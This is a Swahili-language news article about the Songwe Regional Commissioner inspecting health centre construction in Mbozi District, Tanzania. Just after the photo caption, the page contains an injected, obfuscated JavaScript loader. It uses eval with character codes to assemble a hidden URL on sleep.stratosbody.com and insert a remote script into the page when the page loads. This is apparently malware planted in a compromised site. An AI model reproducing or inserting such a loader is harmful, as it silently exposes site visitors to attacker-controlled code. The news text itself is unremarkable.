Recent Comments

Mkuu wa Mkoa wa Songwe aahidi kusimamia matumizi fedha za miradi ya afya

<p>Bi. Chiku Galawa akikagua moja ya majengo yanayojengwa kwa ajili ya kutoa huduma za afya kwa wakazi wa mkoa huo.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

 

Na Steven Samwel – Songwe.

Mkuu wa Mkoa wa Songwe, Chiku Gallawa, amesema atahakikisha anasimamia kwa ukaribu fedha zilizotolewa na serikali Mkoani hapa kwa ajili ya upanuzi wa vituo vya afya ili zifanye kazi zaidi ya ile iliyopangwa awali kutokana na kuongezeka kwa nguvu za wananchi.

Gallawa amesema hayo wakati wa ziara yake Wilaya ya Mbozi, kukagua maendeleo ya upanuzi wa kituo cha afya cha Isansa kilichogharimu shilingi milioni 500 na kituo cha Afya cha Iyula ambacho kinajengwa kwa gharama ya shilingi milioni 400.

Aidha, ujenzi mwingine ni wa maabara, nyumba ya daktari, chumba cha upasuaji, jengo la mama na mtoto na chumba cha kuhifadhia maiti.

“Fedha hizi lazima zifanye kazi iliyokusudiwa……sambamba na hilo, tuongeze pia kazi nyingine za ziada kutokana na wananchi kuamua kujitolea lakini pia hata hawa mafundi tunaowatumia ni wazawa na wenyeji wa maeneo haya haya….kwahiyo gharama zao zitatupa unafuu ambao tunatakiwa kuutumia kuongeza kazi nyingine”, amesema Bi. Gallawa.

Ameongeza kuwa licha ya upanuzi wa vituo vya afya kuchelewa kuanza, bado ana imani kuwa wataweza kumaliza ndani ya muda uliopangwa kutokana na uchapakazi wa mafundi wazawa wa maeneo hayo.

Mkuu wa Mkoa Gallawa amesema kukamilika kwa upanuzi wa vituo hivyo, kutavifanya vituo hivyo vivutie na kutoa huduma bora na hata mgonjwa akifika atapata matumaini ya kupona na sio kukatishwa tamaa na miundombinu mibovu ya vituo vya kutolea tiba.

“Tiba ya kwanza ya mgonjwa akifika kituo cha afya ni mazingira yanayovutia na sio majengo mabovu na uchafu……hivyo vitamfanya akate tamaa ya kupata matibabu sahihi. Ahadi yangu ni kwamba tukimaliza ujenzi wa hayo majengo tutapaka rangi paa za majengo yote ili vituo vyetu vya afya vifanane na vivutie”, amefafanua Gallawa.

Aidha Gallawa amemtaka Kaimu Mkurugenzi wa halmashauri ya wilaya ya Mbozi Lauteri Kanoni kuhakikisha anaweka mfumo wa maji safi katika vituo hivyo hasa mfumo wa kuvuna maji ya mvua ili vituo vikikamilika maji yawepo kwa ajili ya matumizi.

Naye Mkazi wa kijiji cha Isansa Wilaya ya Mbozi Bi Stela Mkeya ameonyeshwa kufurahishwa na upanuzi wa kituo cha Afya Isansa huku akieleza baadhi ya kero walizokuwa wakizipata awali.

“Tunaishukuru sana serikali ya Magufuli kwakweli imetusaidia, tulikuwa tunapata shida kufuata huduma za upasuaji wa akina mama wajawazito huko hospitali ya Wilaya iliyopo Vwawa lakini pia hapa kwenye kituo cha afya mzazi akijifungua hata mazingira ya kwenda kujisafisha vizuri kama vile mabafu ilikuwa haitoshi kabisa”, ameeleza Bi Mkeya.

Kwa upande wao mafundi waliokabidhiwa kazi ya upanuzi wa vituo hivyo vya Afya wameonyesha ari ya kufanya kazi hiyo kwa ufanisi na haraka huku wakimuomba Mkuu wa Mkoa asaidie upatikanaji wa taa ili waweze kufanya kazi usiku na mchana, ombi ambalo Bi. Galawa amekubaliana nalo.